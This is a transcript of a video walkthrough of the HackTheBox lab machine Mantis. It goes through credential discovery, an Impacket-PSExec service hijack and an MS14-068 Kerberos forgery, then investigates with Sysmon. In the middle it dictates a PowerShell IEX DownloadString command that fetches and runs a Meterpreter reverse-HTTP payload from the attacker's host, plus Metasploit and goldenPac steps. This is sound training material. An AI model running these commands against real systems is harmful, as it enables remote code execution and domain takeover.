What's going on YouTube? This is Ippsec and we're doing Mantis from HackTheBox. Getting used on this box wasn't that interesting because it was pretty straightforward. You find SQL credentials on a web server, but finding that web server is a little bit difficult because this box is a domain controller on Active Directory, so it has a lot of open ports that you just got to sift through. Once you find the SQL credentials, you can log into the database and dump a domain user credential. But getting root on this box is where it becomes amazing because the intentional method is a Kerberos forging attack, which is wizardry of itself. That's a CVE in 2014 that tricks the domain controller into thinking you're an admin and just gives you that access. But this box gets even better because of a unintentional admin method. If you used Impacket-PSExec and just got really lucky, you just got admin. So we're going to dig into that and exactly what happens. The too long didn't watch is the creator of this box ran PsExec, didn't clean up his tracks, and left a nasty backdoor. So I'm going to spend a lot of time digging into that because I love doing instant response type things, and this is a prime example. So let's jump in. Starting things off, we do nmap with -sc for we'll do sv first, that was a typo, for enumerate versions, sc for default scripts, oa to output all formats, and we'll throw it in the directory nmap and call this initial. The IP address of Mantis is 10.10.10.52. Looking at the results of this script, we do see a lot of ports open. We got DNS open, 88 open, which is a Kerberos port, RPC, NetBIOS, Active Directory LDAP. It's a 2008 R2 box, Service Pack 1, SQL Server 2014. And that's a good clue that you may want to look at a CVE in 2014. I didn't realize that before. The SQL script ran. We got the global catalog port. Another big clue that this is a domain controller. Port 8080. It says this is running IIS with a blog called Tossed Salad and a bunch of other RPC ports. So what I'm going to do is, we had a lot of ports open. I'm going to do a full nmap and then poke at 8080. So always want to have some type of enumeration going in the background. nmap-p-, that's going to do all ports, output all formats, nmap, and we'll call this all ports 10.10.10.52. It's just a bit easier than writing 1 dash, I think 65,535, but let that run and go to the port 8080 since that was the web server and we generally like attacking web servers. This is incredibly slow. Going here, it is 52, not 42. And we get the blog. So one thing that's interesting is this box was released in 2017 and the footer on this website says 2018. So off the bat, we know this CMS is just putting the server's local year in the footer. The server was actually built probably September 1st of 2017 because that's when all these blog posts appear. So that's at least around the time this box was being created. We have a login prompt, so we can just try a few basic things like admin, and it doesn't work. Our port scan isn't done yet, so trying a few other things, we can go to like /robots.txt, not found. If we do Control U, we can scan, try to find out what version of Orchid this is, because we know it's Orchid CMS. I believe that's a CMS. Yep, so you could do something. I think we do it in one of my very first videos. I want to say popcorn, of downloading a bunch of versions of the CMS and then just MD5 summing or hashing a bunch of static files like JavaScript and then finding out the exact version that way. But the exploit isn't actually in the CMS, it's in something else, so we will just wait for that nmap to finish. So now that the nmap finished, we can see how many ports are open. Right off the bat, I didn't notice leet before, and it's now open, but let's run a script scan against them all. So before, I did OA all ports, so let's do a grep-op because it's such overpowered. Essentially, all it does is only show what is matched. So if I do like waste on nmap all ports greppable nmap, it's only going to show me waste since that's what it matched. So we're going to do first a cat on nmap all ports gnmap. That's again greppable nmap. We're going to do a grep. Start off with a space. Then we want to do a digit. And we want to do 1 to 5 of them, because 65,535 is 5 digits long. And then we're going to end that with a slash. So if we look at the output of that, we just have a long list of ports. So what we can do with that is first a sed to get rid of that space and slash. I screwed that up. I need to put this quote there. And then we can do tr, say, hey, take off those slash n's, and make them commas. So I can copy all these ports and do a different nmap. So sc sv -p, put all the ports, and we'll call this targeted. This shouldn't take too long, but let's just look at that leet port. Can we get to it over the web? So 10, 10, 10, 52, leet. And we get IIS. So let's drop a GoBuster. That was weird. Huh. My path must be screwed up, because I don't know why as soon as I open up a new terminal window, it's saying export command not found. Echo path. Good enough for me. Not sure exactly what's going on with my box, but that's a problem for another day. So, what was I doing? Oh, GoBuster. So GoBuster-H, we will do the -u for URL, HTTP 10.10.10.52, and leet. Then -w for the path to the word list, user share word list, GoBuster, and we will do directory list 2.3 medium. And we'll do lowercase. I think it's all lowercase. This may go faster. -t for threads, and we'll say 20. Default is 10, so go a little bit quicker. Hopefully that comes back soon. Nmap is still going. That is just about done. And let's see. Root local. That shouldn't be there. Hey, that problem's fixed. That is awesome. So we will just wait for this GoBuster to finish, and then we can go to the next step. So we have a directory come back, secure_notes. So let's check that out. we have web.config and dev notes. Web.config returns a 404 not found. Dev notes gives us some instructions. Viewing the source just in case there was something hidden in the HTML. So this is how they install the server. So they download Orchid CMS, download SQL Server 2014 Express, create the user admin, and create the Orchid DB database. Launch IS. So there's nothing about the password, but something looks odd in this URL. So if we try to base64 decode it, there we go. We get this bunch of digits. So what I'm going to do is echo-n, so we don't have a trailing line, and do wc-c to count the number of characters. 36 characters. That is a odd number of characters, so I don't think this is going to be any type of hash. If it was like 32, I think that's like MD5 sum. Let's check. Yeah, so if it was like 32, I'd suspect MD5 sum. But this, I'm guessing may be hex. So echo-n, pipe that to xxd-ps-r, I think is the command. Yep. So what ps does is, well, xxd first. Let's take a file. So we'll xxd. Actually, what we'll do, run that command, put it to sql.password. If we run xxd against that, we get a bunch of hex. So we got the location in hex, or I think that's in hex. Maybe I forget exactly what that field is. I know it's the location. I don't know if this is in hex or not, or binary, but not binary. I'm pretty sure this is hex. Talking is hard. You can never prepare enough to do a video. Let's see. Yep, that's in hex. Okay. So the location in hex, or distance, space, whatever. Then you got the actual hex, and then some plain text of what this decoded to. So what PS did was says, hey, let's get rid of this first column and this last column, and it only showed me the hex. And then what -r does is reverse. So since I gave it hex, and I said, hey, this is only going to be hex, it's not going to be in the format of these 3 columns, and I want you to reverse it. So that's all that was. So now we got the SQL password, and that's mssql_sa_password. So this is either the SA account, which is the system admin account, or admin, which is what the dev note said. So we have to open up a SQL browser and start testing our logins. There are 2 quick ways to do it. We could do it through the command line, and on Kali that would be sqsh, or we could open up a graphical database manager type thing. And I prefer the graphical one, and I'm going to use dbeaver, or dbeaver. You can see it. The reason why I like GUIs when dealing with database stuff, because, well, Oracle, Postgres, MySQL, MS SQL, etc. all have slightly different syntaxes and different clients normally, and it can be a real pain in the butt. So this tool generally has all the databases I need, and I don't have to really remember all the nuances between syntax because, well, I can just click. So that's what I'm going to do. So 10, 10, 10, 52. Database was Orchid DB. Username, try admin, because that's what the instruction said, and the password is MSSQL admin password. We can test the connection. Connected, so that is a good sign. Even supports SSH tunneling. This is a awesome client. So save password locally, that is fine. And we will finish. So let's resize this to make it as uniform as everything else. And we can just drill down. So we want to look at OrchidDB, the DBO, the tables, and we have a list of all the Orchid tables. So what I'm going to do is I just want to look at users. So I'm just going to search for users in this top, and we can see the blog user part record. So double click that. We get how it's created. We can click on data, and we can view all the database information in this. We got an admin password, and we have the James password. And this is actually base 64 encode if we look at the end. And it's also hashed. So this, I guess, CMS supports both plain text and hashed passwords. So we could try to crack the admin password or just try this James thing out. We got James at htb.local, which is kind of a domain name. If we go back to our nmap, let's see. The domain name is htb.local, and remember we said this was a domain controller, so chances are this is a domain user. And this is where I had just done PSExec and got really lucky. So let's do the unintended route first, and then we'll do the Kerberos forgery with the CVE. So what I had done is used PSExec on Linux. So if I do locate PSExec, we have quite a few things. Don't want nmap, I want Impacket, and we have one right here. So user shared doc. I don't want doc. Huh? I think I do. Yep, that works. Sounds on, but nope, that's it. It's a PS example in their documentation. So we want to do htb/James. We could also do .local with domains. That doesn't matter. But then we want the IP address, which is 10.10.10.52. And we want to run cmd.exe. The password, James password. So can we copy this? We can. Paste. That was not my clipboard. Is that my clipboard? There we go. And we get a shell. We do who am I? And we are ntauthority/system. Box done. And I think the funniest thing about this is the script saying, hey, is admin writable? No. Okay. Is C $ running or cvol? Nope. Net login, can we write there? Nope. Sysvol, can we write there? Nope. Okay, well, I'm going to start uploading a file. It errored. And then it just asks, hey, can I get a shell? And so I was like, why didn't you ask that before? And just gave it right up. So that is the unintentional method. And you may be a bit confused. And yes, this is actually an admin user. If we go to administrator, and we can go to desktop, I won't read the flag, but we shouldn't be able to get into this directory. We could do like net local group administrators. So the member of administrators is administrator, domain admins, and enterprise admins. So these two are Active Directory groups. We can do like net group domain admins, see only administrator, and we can do net group enterprise admins. Net group enterprise admins, see only administrator, net user James. He is only a member of domain users and remote desktop users. So this was definitely a confusing time at how we got admin. So we will have to dig into that. To do that, I want to actually remote desktop to this server because it's a bit easier to start installing things and do instant response when you have a GUI if we don't have any tools, which since we're doing this all free, we're going to go with no tools. I want to go to desktop. Nope, not desktop. Let's just exit. There we go. Back in my working directory. So go back to nmap and we can do all ports nmap. And we don't see 3389. So remote desktop's not running. So let's enable remote desktop. And I don't know all the commands to do it, and sometimes there's firewalls, so how I like doing it is just metasploit. So go opt unicorn, and we're going to do python unicorn.py, and this is just a tool by TrustedSec. I've used it in other videos, but if you just Google TrustedSec unicorn, this is what I'm using. So I'm going to specify Windows, interpreter, reverse HTTP, my IP address, which is, I don't know what it is, ifconfig ton 0, 10.10.10.14.2, or 10.10.14.2. And the port, let's use 443, even though it's not going to be HTTPS, it doesn't really matter. And we'll generate that shellcode. Okay. Let's split vertically. And what I'm going to do is copy PowerShell attack to documents, HTB, boxes, Mantis. And I'm also going to copy unicorn.rc there. Let's get back to my directory. So we have this unicorn.rc file, so we can just do msf console-r unicorn.c. I think it's Arctic I used unicorn in. Sounds correct. And that should load Metasploit up. I don't know why it's taking so long. There we go. What I want to do is make the HTTP, move PowerShell.attack into HTTP, and we can do python-m simple HTTP server. I specify 80, so that's on port 8000. Doesn't matter. And now I can do PowerShell IEX new. There it is. New object net.web client download string HTTP 10.10.14.2 port 8000 PowerShell underscore attack.txt. That should be in double quotes. I should have copied that. Oh well. 10.10.14.2. Okay. Executes that. Should see this on my HTTP server. 10.10.14.2 8000. Something is going on. I think Python simple HTTP server was dorked up. Because as soon as I hit Control C, no, nothing happened. Localhost 8000. It's open. Tables dash capital L. That's good. I guess we'll try that again. So PowerShell IEX new object net.web client download string. Whenever the quotes messed up. I'm going to try with different quotes next. PowerShell. Copy, paste, copy, paste. I hate quotes. I really do. So, if you have troubles, try reversing the quotes. So we got this file. It's doing magic, I think deobfuscating the PowerShell right now. And then we should get something over on Metasploit. There we go. Got our shell. So we can now search for RDP and use post Windows manage enable RDP. Info, let's see, set password. We'll just do a weak password. Set username, Ippsec, set session. Since session 1 open, that's what said interpreter. That's why I did that. Run. Now we got a remote desktop, so we can do our desktop -G because it's going to be resolution. Let's say 1600 by 900. I don't know. 10, 10, 10, 52. That is actually a decent size. So specify my user, Ippsec, password 1234, exclamation point, dot slash. Now, notice how it's changed from login to Mantis to HTTP. Password 1234, and now we get in. So we want to debug exactly what's happening, so we have to go to the event log. So MC, not UAC. Yes. Add. Yep, this computer. There we go. And go over to security. Let's see. There are a lot of events. So what's this? Account failed to log in. System Mantis. I don't think that's me. Nope, that is me. We were probably like 35 or 34. I guess I couldn't log in again. So let's go back to this. What did I do? This is Impacket. We will copy this. Run it. Put a failed password in. Go to event log. Refresh. We got an audit failure. So that's going to be a marker so we know when the last time was. And put Jane's password in. Thought I typed it right. Okay. So we're going to refresh. This audit failure is us. And we see attempting to authenticate, login successful, and that's logging in as James, who is definitely not a domain admin. Does some credential validation. Again, James. And that's all we get in the security log. Application log, I don't think we get much. Yeah, nothing. System, nothing. Setup for events, nothing. So nothing too interesting right there. And we could, actually I have MC open ready, so we could add another snap in if we want to look at Active Directory. Users and computers. And we can see, I'm probably in users. That's me. Where's James? Right click, find James. He is a member of just those two groups, nothing else. And you can also go to oh, they're here, and users, duh. Domain controllers, domain users, should be domain admins, there it is. Members, exactly the same thing we saw when running net group, so nothing too interesting there. In order to debug this a little bit further, I actually installed Sysmon, which enhances the logging by a lot. So we have to download Sysmon, so I just Google Microsoft Sysmon download, and this should be it. Download it. We'll just open with Archive Manager, because I don't know if the box over there on HackTheBox has a unzipper. We'll copy Sysmon 64-bit.executable to a desktop. Sysmon needs a config to run, or run well, and Swift on Security has a really good config, at least a starter config. So just Google Swift on Security Sysmon, and we want to download this file. Save page, desktop, save that. So we got those two files there. So let's go back into a window, and we want to go where our simple HTTP server is. And we'll copy the two files off desktop. Set that back up. We'll change to port 80 so it's a bit easier. Go to remote desktop, and we can start Internet Explorer. Our web server's IP, which is 10.10.14.2. We want to download sysmon.exe and sysmon export.xml. Okay. Open up a elevated command prompt. Go to users, the user you created, /downloads. And we install Sysmon by just doing sysmon64.exe-i. And we have installed Sysmon. And we can specify the config at sysmon export.xml. And Swift on Security is awesome because that config is super well documented. So if we look at the config, sysmon XML, it has a bunch of event IDs. So sysmon event ID 1, this is process creation, has a bunch of rules, all processes included, and explains exactly what this event ID is. And this becomes extremely handy. You got file creation time retroactively changed. So that's like someone changed this file's creation time to be something what in the past or something, I guess. Network connection initiated. So when a process starts a network connection, throw a log. Status messages. When a process ends, throw a log. When drivers are loaded to the kernel, throw a log. DLLs loaded by a process, throw a log. You can see just all this in-depth logging that Sysmon is providing. Remote threads created. Raw disk access. So if you do like volume shadow copies on a domain controller and to grab ntds.dit or use Ninja Copy, this will throw a log. And the cool thing about it is it says it's disabled because it causes high system load. And then it goes down and says a comment. You will likely want to set this to a full capture on domain controllers because no process should ever be doing a raw read, and that's because of the scenario trying grab ntds.dit. Inter-process access can throw high CPU, so it's disabled. That's monitoring for processes accessing other processes' memory. If you enable this, be sure to exclude antivirus because antivirus is very noisy in this process ID. File creation events. So we're looking at, let's see, is exe here? Yep, all executables will log on file creation. Registry modifications, alternate data streams. So just a bunch of good stuff in Sysmon. So now that we have it installed, we can access the Sysmon log by going into Windows logs, application service logs, Microsoft Windows, and then Sysmon. Maybe I have to refresh. Let's close this and open it again. No. Okay, Microsoft Windows Sysmon. There we go. And now we got this operational log. And we can already see process creates and stuff. And that's me starting MMC. A process terminating. So let us do that again. See, process create is now going to be on the top. Go back to our Linux thing and run this again. I just made a typo. Okay, got the shell. Hit F5 to refresh. And we should have some new stuff. Process create right here. Network connection. So let's see. Source IP FE80. So this is not us probably. Trying to think what that's doing. Not sure. Another IPv6 one. 135. MMC. So for some reason, the network detect did not flag on us. This is doing MMC stuff localhost. But we do have a process create, and it created the executable DZE. Well, it didn't create. It started the process. It didn't create this executable. It would be file create if it created the file. But since it's process create, it just started this executable without getting a process, a file create. Started a process without creating a file there. And that's because this didn't get fully cleaned up by someone. So we can see it even tried to upload that file. We tried to upload uljkkjhr.exe, but it executed this file. If we go into the services, we can find out exactly why it executed that file. The service ihxm, path to execute, that file. So let's look at exactly what this file is. C:\Windows D. Let's see. There it is. It was created on September 1st, 2017. So this isn't us at all. This is just PSExec hijacking a previously created service that allowed us to use named pipes and still execute a command as admin. So notice when I control seed earlier, let's see, to get out of this, and that's why I did a whole new PSExec instead of using the one on one right here, is because I didn't want it to clean up the installation. And If it cleaned it up and removed the service, then I won't be able to get another session. So I left the session open so it can't remove that binary, if that makes sense. Because if I try to delete that, it's probably going to say it's in use. Yeah. And that requires admin because it is open. So since I have the shell open in this window, when I'm exiting Impacket, it's not kicking me fully off. So if we Control C out of that one and Control C out of this one, we'll see if it actually cleans up. That binary is there, I think. Still there. If we refresh here, still here. But if we go again, just put this password to prove that it's this service. That's the James password. Logs in. We can do it multiple times. And it's not cleaning it up, I guess, because it's thinking it's RZR, FHCU, or whatever. But if we stop this service, so that name pipe no longer exists on the box. Oh, it's still executed. Let's see. Let's do that again. That service is, let's see, not running. Okay, let's look at Sysmon and see what happened. Am I still executing that file? Process create. Different one, EFU. So let's go back to our registry and see if we missed a service. There's a TZZW. If we go to properties, we do have this service. So let's exit that. Stop this. And now we no longer get a shell. So Impacket-PSExec is smart enough to find a service that is configured, I guess, with Impacket-PSExec and hijack that path, which is pretty cool. So we verified James isn't working. So what I'm going to do is something pretty cool, I think. And we're going to specify my user, Ippsec. And let's see, echo, change the password. I'm going to log in. And now let's look at Sysmon. What did this say? Let's see. We got registry events, so we created a service drvl. We created that file. Let's see, is this still us? Nope, that's not us. I don't think that's us. So what file did we create? Yep. So this is us. Sysmon saying we created C:\Windows LZE, which we did, because remember Ippsec's an admin. And then it created, let's see, a registry value, another registry value. So this is creating the service. If we go into services drvl, if we refresh, saw everything move down because the service got added up here. We have that service created. Then we got a process creation and another process creation. But that's not the cool thing. So if we copy this, and do it to the James user. J at M3S. And it now works. So because we have a PSExec session running currently as system, the other PSExec as a domain user is able to hijack that name pipe and get on. So one of the dangerous things about, I guess, Impacket-PSExec. If we exit out of that, we see stopping the service, removing file. And if we try to get to this again, we can't because it's successfully cleaned up. There are other ways to do like PSExec things, like I think WinExe is one. I think this is mimicking PSExec, but -u HTTP Ippsec 10.10.10.52 cmd.exe. This load password. I get on, and now let's see. Jane's pass was still my clipboard, so let's do the same thing with WinExe. And we still can't do it. So WinExe is a little bit different. However, WinExe does one dangerous thing, I believe, and there is a -- uninstall flag, which uninstalls the WinExe service after remote execution, and I don't think that's default. So if we go back to Sysmon and look at registry creations, drvl, there we go. WinExec service is what it creates, and I no longer have WinExe running. We have the service still here. So, and that service executes nothing. Oh no, there it is. WinExe svc.exe. So, I don't know if that binary is secure, if it opens up another hole like Impacket did. And it's just not smart enough to go and exploit that hole. But something to keep in mind when you do pen test is always do at least the minimum amount of instant response to make sure you're not leaving artifacts behind. And Impacket's still not working. There's one other thing we can look at if we really wanted to and get the creation date of the registry key. And after that, we'll end the instant response portion of this video. So if we go to regedit and try to view this key. So let's see. This comes in really handy because it's not easy to get when a service was created if you lost the event log of it. Let's see, because there's nothing in the services creation thing that has when it was actually created, but you can still pull that forensically. So that's in HKey local machine, system, current control set, services, and we go like when exec service. We still don't see any creation dates in this registry, but there is a trick to get it, and we're going to use PowerShell to do it. So let's clean up our window a little bit and go back to a web browser because we're going to want to grab another file to help us do this. technet get last write time registry key. Download this PowerShell script. Download this PowerShell script. I agree. Save. And we'll copy it. Oh, it's in downloads. Is it capital G? That looks good. Go back to desktop and open up Internet Explorer. Download this. Allow. Version 2 will always be safe. I'm not sure if version 3 is on this. But that's what we want. This is a PowerShell snippet. Load PowerShell. Go to my desktop. And we want to import the module. Execution policy. Not sure why I ran it twice. I just hit the up arrow too few times. Okay, so now we should have add reg key member as a PowerShell snippet. So I can do get item. We gotta specify the registry key, which is HKLM. And then system, current control set, services, IHXM. I think that was the very first one we looked at. I'm not sure if this is going to be changed because of us disabling the service. I think it may have been updated. Nope. So, even though we disabled the service, the last write time is still November 1st, 2017 at 1 p.m. And that's the time this service got created. If we do the same thing with, what was it, when execs svc, exec svc, can find path. What was the service name? When exec, oh, when exe, no exec. Where am I? Right here. We can see I created that on today at midnight. Oh god, it's midnight. Oh well. But that ends the incident response piece of this video. And we will now, I guess, go into the intended route, which is the Kerberos forgery. I guess I can just log out. And we can clean up. Exit, exit, exit -y. Clean. Beaver we don't need. Exit. Don't need you, don't need you. Okay, now that we're at a clean slate, let us begin the intended route. Actually, I lied. There's one other thing I wanted to show before we go into that. While digging into this whole issue with how easy it is to jump on a named pipe as a domain user with Impacket-PSExec, if you go to their GitHub and go to issues, let's look at closed, and we'll search for admin, I guess. We got something by Alamont, who is a HackTheBox player, and he did this on November 13th, which is probably right around the time this machine got launched, asking, why the hell am I able to do this? And it looks like he's pretty much just doing what we just showed in the video, and he doesn't know how it's working. And here they told him, look at the services running, and saying you should always clean up. Yep, if you clean up, this problem goes away. But yeah, I found it funny when digging through GitHub stuff, you find someone from HackTheBox asking a question. So let us continue into the intended route for real this time. So instead of pretending I know this all by heart, we're just going to Google the article. Knock past Kerberos exploitation. I'm going to follow the instructions on this. I think this is it. A link to this article. Nope, that's not it. Second one here. There we go. This is what we want to do. So here's a little write-up on it. Does this actually explain the vulnerability? Yep, this kind of explains it. Local. Doesn't give a good explanation. I don't fully understand this attack, but there's a great guide to exploit it. So let us do it. First, we have to install these packages, and I don't think I have that Kerberos package installed, so we will install it. And then after that, we do a nmap, and that's going to be a UDP scan, and I guess they're looking for NetBIOS. Don't know why they chose UDP. Oh, -P. Oh, I didn't know you could do that with nmap. You can actually specify U:UDP and T:/STCP. That's cool. I wonder if you need that -SU flag there to specify UDP. Anyways, going here, we have to create a etc host. I don't think this is needed. I think it said local. Kerberos server, host name. I think we're creating this file that it's asking us to, but I think it was Mantis? Mantis, I think. I'm pretty sure we're going to disregard that setup from editing this file. But v etc host, and we can do 1010 1052 mantis mantis.htb and htb I think. Mantis htb.local htb mantis.htb.local. I think that's everything. I think you only need HTTP and HTTP.local, but I'm adding the actual Windows hostname as well, which is Mantis. Okay. Name server, let's point ourselves to server, so etc resolve.conf. Name server 10.10.10.52. And network manager is going to try to rewrite this file, so change attributes. I think +i resolve.conf. Thought that was. Huh. I could have swore I could have made that file immutable, and that would have prevented it from going back. Oh well. Now we have to do Kerberos, so this is doing it, so let's see. That was etc kerberos5.conf. So kerberos5.conf to kerberos5.conf tilde. Realms. So we want mantis.htb.local, I believe. Default domain. HTTP. Okay. That all looks good. Our date, we have to set our server's date close to it, so Mantis HTTP local, date set. And now we got to generate a Kerberos ticket for a domain user, so init James, JNM3S. List to list tickets. We have successfully authenticated with the domain. That is awesome. And we're going to try to connect to the domain with SMB client and get an error because we don't have access to cvol. HTTP Mantis access denied. Okay. We need to get the unique identifier for a user. So James and the domain controller. Surprised it asked for that. Okay. JNM3S. PC client. Look up names. Okay, we got the SID. Just save that. And now we should be able to do this Python script, which I don't have. Do I have it on Kali? Do not. Did I miss a link to download this? Google. Should be easy enough to find. There we go. PyKek. Kerberos exploitation kit. Let's just download this whole thing. For Windows. That's fine. And you may guess, I haven't really done this in a while. So, we'll see if this works. Python hb-s-d. Okay. So we want to do Python ms14 -u james at htb.local -s and then the SID. Then -d and the domain. Please work. We created the ticket, it looks like. And now we can list. How did he dump the? It's weird. If I do a new go here. We still got 2 tickets, and they are expiring not anytime soon. Oh well. See what happens. We'll move that over to this directory. Go in there. I still need that, don't I? Oh, we move it to temp Kerberos 5. Okay, we have added that into, I guess, our Kerberos directory. And now we should just be able to SMB client. Mantis failed, no login servers. Huh. I missed a step to clear the tickets. Ticket cache file. Where's my ticket cache file? Okay, it's there. It's definitely a new ticket, so placing it there gave us the new ticket. James at htb.local. Let's see. Frickin' hate whatchamacallit. Network manager. Of course there's no login servers. There we go. That works. It was network manager editing my resolve.conf, so I couldn't resolve the name. And that's why it said that. So we have a admin SMB access to the CVOL. So we could just go to administrator and then desktop. I think it's Git. And we downloaded root.txt. Size of 32, that's MD5 sum. We won't look at it. But we can take this one step further and use golden pack, which will use this ticket in like the PSExec and give us a shell. So let's try that. Locate golden pack. Do I have it? I do. And all we specify is username and then that. So HTB James at Mantis. No module name pack. See opt Impacket. Impacket. Try it from here. No module named pack. Oh, what's the worst that can happen? There we go. But I don't think it should have. Oh, it does ask for password. Okay. Attacking domain. Mantis found vulnerable. More processing required. Still busy. Specified I/O. Let's try that again. I wonder if this is something we did. So I'm going to. I guess we can try restarting the server service real quick and then revert the machine and try it. But that should work. So switch user. We created Ippsec. Okay, and now we want to server. Restart. Yep. Still fine. Val login. User force attacking. Why do you do that? Starting everything back up. Okay, I guess we have to revert the machine because we had screwed it up doing something. So, I'm going to pause the video, redo all these steps, and try again. Good news! I figured out the issue and the machine didn't have to be reverted. Running through the steps again, thinking about what I was doing, I noticed when we generate the ticket with MS14068, we specified .local, and when we were doing golden pack, this is my verifying it worked, we were not doing .local. So we don't have that. It gets busy. We add .local. And we get on. And the reason for that is probably because we're spoofing a ticket. So we have to have the full name of the ticket. So, yeah, that was silly. I wish it told us a more descriptive error, but that was the issue. That being said, we can kind of see how this mistake actually happened now. Because I bet if I go to the James user right now, I'll be able to just get on the box, because this is the same exact prompt and status that PSExec does. When we found that PSExec issue, we have a found writable share in admin. It uploads a weird file. It opens Service Manager, creates a service of 4 characters, and starts it. So this is probably why the PSExec or Impacket-PSExec worked, is because when the creator was making it, he just did golden pack, got the shell, and didn't clean up properly. He probably just powered off the VM when he had a shell, and it didn't do these remove steps, which created that backdoor. So when we used PSExec found the backdoor and gave us a system shell. Hope that makes sense. But that is Mantis. Hope you enjoyed the video, and I will see you all next week.